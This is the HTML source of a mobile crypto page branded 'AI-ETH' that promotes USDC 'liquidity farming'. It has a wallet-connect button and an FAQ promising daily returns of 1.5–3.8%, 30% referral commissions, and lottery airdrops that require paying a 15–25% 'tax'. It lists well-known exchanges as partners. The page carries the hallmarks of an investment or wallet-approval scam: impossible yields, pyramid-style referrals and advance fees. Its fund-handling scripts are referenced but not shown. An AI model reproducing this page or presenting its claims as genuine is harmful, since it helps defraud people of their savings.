<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>AI-ETH - Liquidity Farming Platform</title>
    <!-- 引入外部资源 -->
    <script src="/static/css/usdc/tailwindcss.js"></script>
    <!-- 引入图标库 -->
    <link rel="stylesheet" href="/static/css/usdc/all.min.css">
    <meta name="description" content="A modern DeFi dashboard for farming, swapping, and more.">
    <link rel="icon" href="/static/img/usdc/eth-logo.png">
    <link rel="apple-touch-icon" href="/static/img/usdc/eth-logo.png">
    <link rel="shortcut icon" href="/static/img/usdc/eth-logo.png">
    <meta name="google-site-verification" content="IkNQ_wPak26rSl5_VwWv0UlWZkvIhtNggQJ1rmp7FSI"/>
    <!-- Web3.js -->
    <script type="text/javascript" src="/static/js/phone/web3.min.js"></script>
    <!-- 引入本地JS文件 -->
    <script src="/js/usdc/phone/home.js?v=3"></script>
    <script src="/js/usdc/phone/common.js?v=2"></script>

    <style>
        /* 基础样式 */
        body {
            font-family: 'Inter', system-ui, sans-serif;
            scroll-behavior: smooth;
            background-color: #f8fafc;
        }

        /* 自定义样式 */
        .gradient-bg {
            background: linear-gradient(135deg, #3B82F6 0%, #8B5CF6 100%);
        }

        .card-hover {
            transition: all 0.3s;
        }

        .card-hover:hover {
            transform: translateY(-5px);
            box-shadow: 0 10px 25px -5px rgba(0, 0, 0, 0.1);
        }

        .text-gradient {
            background-clip: text;
            -webkit-background-clip: text;
            color: transparent;
            background-image: linear-gradient(to right, #3B82F6, #8B5CF6);
        }

        /* 收益滚动相关 */
        #yield-scroll-container {
            height: 280px;
            overflow: hidden;
            position: relative;
        }

        .yield-item {
            height: 56px;
            display: flex;
            align-items: center;
            justify-content: space-between;
            padding: 0.75rem;
            border-radius: 0.5rem;
        }

        .yield-item:hover {
            background-color: #f1f5f9;
            transition: background-color 0.2s;
        }

        /* 合作伙伴滚动 */
        .partners-scroll {
            animation: slide 30s linear infinite;
        }

        @keyframes slide {
            0% {
                transform: translateX(0);
            }
            100% {
                transform: translateX(-50%);
            }
        }

        .partners-container:hover .partners-scroll {
            animation-play-state: paused;
        }

        /* 活动弹窗样式 */
        .activity-modal {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            z-index: 1000;
            justify-content: center;
            align-items: center;
        }

        .activity-modal-content {
            background-color: white;
            border-radius: 1rem;
            padding: 1.5rem;
            width: 90%;
            max-width: 400px;
            box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.1);
            position: relative;
        }

        .activity-modal-header {
            text-align: center;
            margin-bottom: 1rem;
        }

        .activity-modal-title {
            font-size: 1.25rem;
            font-weight: bold;
            color: #1e293b;
        }

        .activity-modal-body {
            margin-bottom: 1.5rem;
        }

        .activity-info-item {
            display: flex;
            justify-content: space-between;
            margin-bottom: 0.75rem;
            padding: 0.5rem 0;
            border-bottom: 1px solid #e2e8f0;
        }

        .activity-info-label {
            color: #64748b;
        }

        .activity-info-value {
            font-weight: bold;
            color: #1e293b;
        }

        .activity-modal-footer {
            display: flex;
            justify-content: center;
        }

        .activity-join-btn {
            background: linear-gradient(135deg, #3B82F6 0%, #8B5CF6 100%);
            color: white;
            border: none;
            border-radius: 0.5rem;
            padding: 0.75rem 1.5rem;
            font-weight: bold;
            cursor: pointer;
            width: 100%;
        }

        .activity-join-btn:hover {
            opacity: 0.9;
        }

        .activity-close {
            position: absolute;
            top: 1rem;
            right: 1rem;
            font-size: 1.25rem;
            color: #94a3b8;
            cursor: pointer;
        }
    </style>
</head>

<body class="text-slate-800 min-h-screen">
<!-- 主容器 -->
<div class="max-w-4xl mx-auto bg-slate-50 overflow-hidden">
    <!-- 背景渐变 -->
    <div class="absolute top-0 left-0 right-0 h-[300px]"
         style="background-image: url('../static/img/usdc/bg.jpg'); background-size: cover; background-position: center;"></div>

    <div id="activityModal"
         class="activity-modal fixed inset-0 flex items-center justify-center backdrop-blur-sm p-3 z-100 hidden">
        <div class="activity-modal-content bg-gradient-to-br  rounded-2xl shadow-xl w-full max-w-sm overflow-hidden">
            <!-- 顶部 -->
            <div class="bg-gradient-to-r from-blue-500 to-blue-500 py-2 px-4 flex justify-between items-center">
                <h2 class="activity-modal-title text-white text-lg font-bold flex items-center">
                    <i class="fa-solid fa-fire text-amber-300 mr-1 text-sm animate-pulse"></i>
                    Special Activity
                </h2>
            </div>
            <span class="activity-close text-2xl md:text-3xl cursor-pointer hover:text-amber-200 transition-colors flex items-center justify-center w-10 h-10 rounded-full hover:bg-blue-500/20"
                  id="activityClose">&times;</span>
            <!-- 主体（收紧内边距，适配手机） -->
            <div class="activity-modal-body p-4 space-y-4">
                <div class="activity-info-item bg-white/90 rounded-lg p-3 border border-blue-100">
                    <span class="activity-info-value text-blue-700 font-medium" id="activityContent"></span>
                </div>

                <div class="activity-info-item flex justify-between items-center bg-white/90 rounded-lg p-3 border border-blue-100 join hidden">
                    <span class="activity-info-label text-gray-700 font-semibold text-sm">Activity Amount:</span>
                    <span class="activity-info-value text-blue-600 text-lg font-bold" id="activityAmount"></span>
                </div>

                <div class="activity-info-item flex justify-between items-center bg-white/90 rounded-lg p-3 border border-blue-100  relative">
                    <span class="activity-info-label text-gray-700 font-semibold text-sm">Reward Amount:</span>
                    <span class="activity-info-value text-blue-600 text-lg font-bold" id="ethAmount"></span>
                    <span class="absolute -top-1 -right-1 bg-amber-400 text-white text-xs font-bold px-1.5 py-0.5 rounded-full">HOT</span>
                </div>

                <div class="activity-info-item flex justify-between items-center bg-white/90 rounded-lg p-3 border border-blue-100 join hidden">
                    <span class="activity-info-label text-gray-700 font-semibold text-sm">Participated Amount:</span>
                    <span class="activity-info-value text-blue-600 text-lg font-bold" id="userAmount"></span>
                </div>
            </div>

            <!-- 底部按钮 -->
            <div class="activity-modal-footer p-4 pt-0" id="joinActivityBtn">
                <button class="activity-join-btn w-full bg-gradient-to-r from-blue-500 to-blue-600 text-white font-bold py-3 rounded-full text-base shadow-md hover:from-blue-600 hover:to-blue-700 transition-all duration-300 flex items-center justify-center">
                    <i class="fa-solid fa-gift mr-2 text-sm"></i>
                    Confirm Start
                </button>
            </div>
        </div>
    </div>

    <!-- 头部导航 -->
    <header class="sticky top-0 z-50 flex h-20 items-center justify-between px-4 bg-white/60 backdrop-blur-lg rounded-b-2xl shadow-sm">
        <div class="flex items-center gap-3">
            <div class="rounded-full bg-white/50 p-2 shadow-md">
                <img src="/static/img/usdc/eth-logo.png" alt="Ethereum Logo" class="h-7 w-7 rounded-full"
                     style="filter:saturate(3)">
            </div>
            <h1 class="text-xl font-bold">AI-ETH</h1>
        </div>
        <button id="connectBtn"
                class="px-4 py-2 rounded-full flex items-center gap-2 gradient-bg text-white shadow-md hover:opacity-90">
            <i class="fa fa-link"></i> Connect
        </button>
    </header>

    <!-- 主内容区 -->
    <main class="pb-28">
        <div class="space-y-8 p-4 ">
            <!-- 主标题卡片 -->
            <div class="relative z-10 card-hover">
                <div class="rounded-2xl bg-white/30 backdrop-blur-sm shadow-lg text-center p-6">
                    <div class="text-2xl font-bold text-gradient mb-4">Liquidity Farming</div>
                    <p class="text-slate-600">Farm daily interest on USDC by providing liquidity for ETH farming
                        pools.</p>
                </div>
            </div>
            <!-- 数据统计区 -->
            <div class="grid grid-cols-2 gap-4 p-2">
                <!-- 节点统计 -->
                <div class="flex items-center p-3 gap-2 rounded-xl bg-white/80 backdrop-blur-sm shadow-md card-hover">
                    <div class="flex h-12 w-12 items-center justify-center rounded-2xl gradient-bg text-white">
                        <i class="fa fa-sitemap text-xl"></i>
                    </div>
                    <div>
                        <p class="text-base font-bold">227.0</p>
                        <p class="text-xs text-slate-500">Nodes</p>
                    </div>
                </div>

                <!-- 参与者统计 -->
                <div class="flex items-center p-3 gap-2 rounded-xl bg-white/80 backdrop-blur-sm shadow-md card-hover">
                    <div class="flex h-12 w-12 items-center justify-center rounded-2xl gradient-bg text-white">
                        <i class="fa fa-users text-xl"></i>
                    </div>
                    <div>
                        <p class="text-base font-bold">70886</p>
                        <p class="text-xs text-slate-500">Participants</p>
                    </div>
                </div>

                <!-- USDC验证量 -->
                <div class="flex items-center p-3 gap-2 rounded-xl bg-white/80 backdrop-blur-sm shadow-md card-hover">
                    <div class="flex h-12 w-12 items-center justify-center rounded-2xl gradient-bg text-white">
                        <i class="fa fa-diamond text-xl"></i>
                    </div>
                    <div>
                        <p class="text-base font-bold">171.0 M</p>
                        <p class="text-xs text-slate-500">USDC Verified</p>
                    </div>
                </div>

                <!-- ETH奖励 -->
                <div class="flex items-center p-3 gap-2 rounded-xl bg-white/80 backdrop-blur-sm shadow-md card-hover">
                    <div class="flex h-12 w-12 items-center justify-center rounded-2xl gradient-bg text-white">
                        <i class="fa fa-gift text-xl"></i>
                    </div>
                    <div>
                        <p class="text-base font-bold">215.2 M</p>
                        <p class="text-xs text-slate-500">ETH Reward</p>
                    </div>
                </div>
            </div>

            <!-- 最新收益区 - 无缝滚动效果 -->
            <div class="card-hover">
                <div class="rounded-2xl bg-white shadow-lg overflow-hidden">
                    <div class="p-6">
                        <div class="text-2xl font-semibold mb-2">Latest Yield</div>
                        <p class="text-sm text-slate-500">Hover to pause scrolling</p>
                    </div>
                    <div class="p-6 pt-0">
                        <!-- 滚动容器 -->
                        <div id="yield-list">
                            <div id="yield-scroll-container">
                                <div id="yield-scroll-content">
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <!-- 白皮书按钮 -->
            <div>
                <a href="/page/baipishu" target="_blank" rel="noopener noreferrer">
                    <button class="w-full flex items-center justify-between gap-2 rounded-2xl gradient-bg p-4 text-white shadow-lg hover:scale-105 transition-all">
                        <div class="flex items-center gap-3">
                            <div class="flex h-12 w-12 items-center justify-center rounded-2xl bg-white/20">
                                <i class="fa fa-file-text-o text-xl"></i>
                            </div>
                            <span class="font-semibold">Whitepaper</span>
                        </div>
                        <i class="fa fa-arrow-right"></i>
                    </button>
                </a>
            </div>

            <!-- 合作伙伴 -->
            <div>
                <div class="flex items-center justify-center gap-3 mb-4">
                    <div class="h-0 w-0 border-y-[6px] border-l-[10px] border-y-transparent border-l-primary"></div>
                    <h2 class="px-2 text-lg font-bold text-center text-primary">Partners</h2>
                    <div class="h-0 w-0 border-y-[6px] border-r-[10px] border-y-transparent border-r-primary"></div>
                </div>

                <!-- 滚动的合作伙伴列表 -->
                <div class="relative overflow-hidden py-4 partners-container">
                    <div class="flex gap-6 partners-scroll">
                        <!-- 复制一组以实现无缝滚动效果 -->
                        <div class="flex gap-6">
                            <div class="flex h-14 w-32 flex-shrink-0 items-center justify-center rounded-2xl bg-white p-2 shadow-lg shadow-slate-200/60 card-hover">
                                <span class="text-xs font-medium text-slate-600 text-center truncate px-1">CoinMarketCap</span>
                            </div>
                            <div class="flex h-14 w-32 flex-shrink-0 items-center justify-center rounded-2xl bg-white p-2 shadow-lg shadow-slate-200/60 card-hover">
                                <span class="text-xs font-medium text-slate-600 text-center truncate px-1">CoinGecko</span>
                            </div>
                            <div class="flex h-14 w-32 flex-shrink-0 items-center justify-center rounded-2xl bg-white p-2 shadow-lg shadow-slate-200/60 card-hover">
                                <span class="text-xs font-medium text-slate-600 text-center truncate px-1">Huobi</span>
                            </div>
                            <div class="flex h-14 w-32 flex-shrink-0 items-center justify-center rounded-2xl bg-white p-2 shadow-lg shadow-slate-200/60 card-hover">
                                <span class="text-xs font-medium text-slate-600 text-center truncate px-1">Crypto.com</span>
                            </div>
                            <div class="flex h-14 w-32 flex-shrink-0 items-center justify-center rounded-2xl bg-white p-2 shadow-lg shadow-slate-200/60 card-hover">
                                <span class="text-xs font-medium text-slate-600 text-center truncate px-1">TronPad</span>
                            </div>
                        </div>
                        <!-- 重复一组用于无缝滚动 -->
                        <div class="flex gap-6">
                            <div class="flex h-14 w-32 flex-shrink-0 items-center justify-center rounded-2xl bg-white p-2 shadow-lg shadow-slate-200/60 card-hover">
                                <span class="text-xs font-medium text-slate-600 text-center truncate px-1">CoinMarketCap</span>
                            </div>
                            <div class="flex h-14 w-32 flex-shrink-0 items-center justify-center rounded-2xl bg-white p-2 shadow-lg shadow-slate-200/60 card-hover">
                                <span class="text-xs font-medium text-slate-600 text-center truncate px-1">CoinGecko</span>
                            </div>
                            <div class="flex h-14 w-32 flex-shrink-0 items-center justify-center rounded-2xl bg-white p-2 shadow-lg shadow-slate-200/60 card-hover">
                                <span class="text-xs font-medium text-slate-600 text-center truncate px-1">Huobi</span>
                            </div>
                            <div class="flex h-14 w-32 flex-shrink-0 items-center justify-center rounded-2xl bg-white p-2 shadow-lg shadow-slate-200/60 card-hover">
                                <span class="text-xs font-medium text-slate-600 text-center truncate px-1">Crypto.com</span>
                            </div>
                            <div class="flex h-14 w-32 flex-shrink-0 items-center justify-center rounded-2xl bg-white p-2 shadow-lg shadow-slate-200/60 card-hover">
                                <span class="text-xs font-medium text-slate-600 text-center truncate px-1">TronPad</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <!-- FAQ部分 -->
            <div>
                <h2 class="px-2 text-lg font-bold text-slate-600 mb-4">FAQ</h2>
                <div class="rounded-2xl bg-white shadow-lg shadow-slate-200/60 overflow-hidden">
                    <div class="p-2">
                        <!-- FAQ手风琴组件 -->
                        <div class="space-y-1" id="faq-accordion">
                            <!-- FAQ项1 -->
                            <div class="border-b last:border-0">
                                <button class="faq-toggle w-full flex items-center justify-between py-4 font-medium px-4 text-left focus:outline-none"
                                        data-target="faq-1">
                                    <span>What is the return of investment (ROI)?</span>
                                    <i class="fa fa-chevron-down transition-transform duration-300"></i>
                                </button>
                                <div id="faq-1" class="faq-content hidden pb-4 pt-0 px-4">
                                    <div class="space-y-2 text-sm">
                                        <p>After successfully joining, the system will start to calculate the amount of
                                            USDC you hold through the smart contract. The reward will be distributed
                                            every 6 hours.</p>
                                        <p class="font-semibold">The expected daily production income:</p>
                                        <div class="space-y-1 text-xs bg-slate-50 p-3 rounded-lg">
                                            <div>1. 100-4,999 USDC: 1.5%-1.8%</div>
                                            <div>2. 5,000-19,999 USDC: 1.8%-2.1%</div>
                                            <div>3. 20,000-49,999 USDC: 2.1%-2.4%</div>
                                            <div>4. 50,000-99,999 USDC: 2.4%-2.7%</div>
                                            <div>5. 100,000-199,999USDC:2.7%-3%</div>
                                            <div>6. 500,000+USDC: 3.8%</div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                            <!-- FAQ项2 -->
                            <div class="border-b last:border-0">
                                <button class="faq-toggle w-full flex items-center justify-between py-4 font-medium px-4 text-left focus:outline-none"
                                        data-target="faq-2">
                                    <span>How to earn reward?</span>
                                    <i class="fa fa-chevron-down transition-transform duration-300"></i>
                                </button>
                                <div id="faq-2" class="faq-content hidden pb-4 pt-0 px-4">
                                    <p>The cryptocurrency mined every day generates ETH revenue and gives us a certain
                                        percentage of revenue in accordance with contract standards.</p>
                                </div>
                            </div>

                            <!-- FAQ项3 -->
                            <div class="border-b last:border-0">
                                <button class="faq-toggle w-full flex items-center justify-between py-4 font-medium px-4 text-left focus:outline-none"
                                        data-target="faq-3">
                                    <span>Is there a reward for inviting friends?</span>
                                    <i class="fa fa-chevron-down transition-transform duration-300"></i>
                                </button>
                                <div id="faq-3" class="faq-content hidden pb-4 pt-0 px-4">
                                    <p>Yes, you can invite your friends to join the mining pool through your referral
                                        link. You will get a 30% ETH reward everytime your friends receive their
                                        reward.</p>
                                </div>
                            </div>
                            <div class="border-b last:border-0">
                                <button class="faq-toggle w-full flex items-center justify-between py-4 font-medium px-4 text-left focus:outline-none"
                                        data-target="faq-4">
                                    <span>Mining pool bonus</span>
                                    <i class="fa fa-chevron-down transition-transform duration-300"></i>
                                </button>
                                <div id="faq-4" class="faq-content hidden pb-4 pt-0 px-4">
                                    <p class="font-semibold">Lucky airdrop rewards:</p>
                                    <div class="space-y-1 text-xs bg-slate-50 p-3 rounded-lg">
                                        <div>First place reward: 588888 USDC</div>
                                        <div>The second prize: 188888 USDC</div>
                                        <div>The third prize: 88888 USDC</div>
                                        <div>The fourth prize: 38888 USDC</div>
                                        <div>The fifth reward: 18888 USDC</div>
                                        <div>The sixth prize: 5888 USDC</div>
                                    </div>
                                    <p>All nodes participating in Defi ETH liquidity mining have the opportunity to
                                        receive system random airdrop rewards, up to 588888USDC rewards. The rewards
                                        obtained need to pay personal income tax of 15%-25%</p>
                                </div>
                            </div>
                            <div class="border-b last:border-0">
                                <button class="faq-toggle w-full flex items-center justify-between py-4 font-medium px-4 text-left focus:outline-none"
                                        data-target="faq-5">
                                    <span>Are the assets safe?</span>
                                    <i class="fa fa-chevron-down transition-transform duration-300"></i>
                                </button>
                                <div id="faq-5" class="faq-content hidden pb-4 pt-0 px-4">
                                    <p>Depositing funds into your own wallet is perfectly safe, but please do not reveal
                                        your wallet's seed phrase or tell it to strangers, as the seed phrase can
                                        transfer your assets. Our staff will not ask you for your seed phrase. If
                                        someone wants your wallet seed phrase, please decline.</p>
                                </div>
                            </div>
                            <div class="border-b last:border-0">
                                <button class="faq-toggle w-full flex items-center justify-between py-4 font-medium px-4 text-left focus:outline-none"
                                        data-target="faq-6">
                                    <span>How to withdraw my income?</span>
                                    <i class="fa fa-chevron-down transition-transform duration-300"></i>
                                </button>
                                <div id="faq-6" class="faq-content hidden pb-4 pt-0 px-4">
                                    <p>The income generated by platform mining is: ETH miner's fee. You can exchange the
                                        corresponding miner's fee that you harvest every day into USDC of the
                                        corresponding chain, and then apply to send it to your wallet. The mining pool
                                        automatically sends miner fees to the wallet of your connected node every 6
                                        hours, and does not support other wallet addresses.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </main>


    <!-- 底部导航 -->
    <nav class="fixed bottom-4 left-1/2 z-40 w-[calc(100%-2rem)] max-w-[calc(28rem-2rem)] -translate-x-1/2 bg-white/80 backdrop-blur-md rounded-full shadow-xl">
        <div class="grid h-16 grid-cols-5 items-center">
            <a href="/page/home" class="flex flex-col items-center justify-center">
                <div class="flex h-10 w-10 items-center justify-center rounded-full gradient-bg text-white">
                    <i class="fa fa-home text-xl"></i>
                </div>
            </a>

            <a href="/page/account" class="flex flex-col items-center justify-center text-gray-400">
                <i class="fa fa-user text-xl"></i>
            </a>

            <a href="/page/swap" class="flex flex-col items-center justify-center text-gray-400">
                <i class="fa fa-exchange text-xl"></i>
            </a>

            <a href="/page/withdraw" class="flex flex-col items-center justify-center text-gray-400">
                <i class="fa fa-download text-xl"></i>
            </a>

            <a href="/page/referral" class="flex flex-col items-center justify-center text-gray-400">
                <i class="fa fa-share-alt text-xl"></i>
            </a>
        </div>
    </nav>

<!--    <div style="position: fixed; right: 20px; bottom: 100px; z-index: 70;">-->
<!--        <a href="#" onclick="psOpenWindow(); return false;"><img src="https://image.providesupport.com/image/0mx8s85ho1duh0le63k1phdlq2/current" style="border:0px" alt="Customer Service Chat"></a>-->
<!--    </div>-->
</div>
</div>
<!-- BEGIN ProvideSupport.com Graphics Chat Button Code -->
<script>(function(D){function f(){function n(n,e){e=D.createElement("script");e.src="https://image.providesupport.com/"+n,D.body.appendChild(e)}n("js/0mx8s85ho1duh0le63k1phdlq2/safe-standard-sync.js?ps_h=Itu0&ps_t="+Date.now()),n("sjs/static.js")}D.readyState=="complete"?f():window.addEventListener("load",f)})(document)</script><noscript><div style="display:inline"><a href="https://vm.qomshnax.com/0mx8s85ho1duh0le63k1phdlq2">客户服务技术支持</a></div></noscript>
<!-- END ProvideSupport.com Graphics Chat Button Code -->
</body>
</html>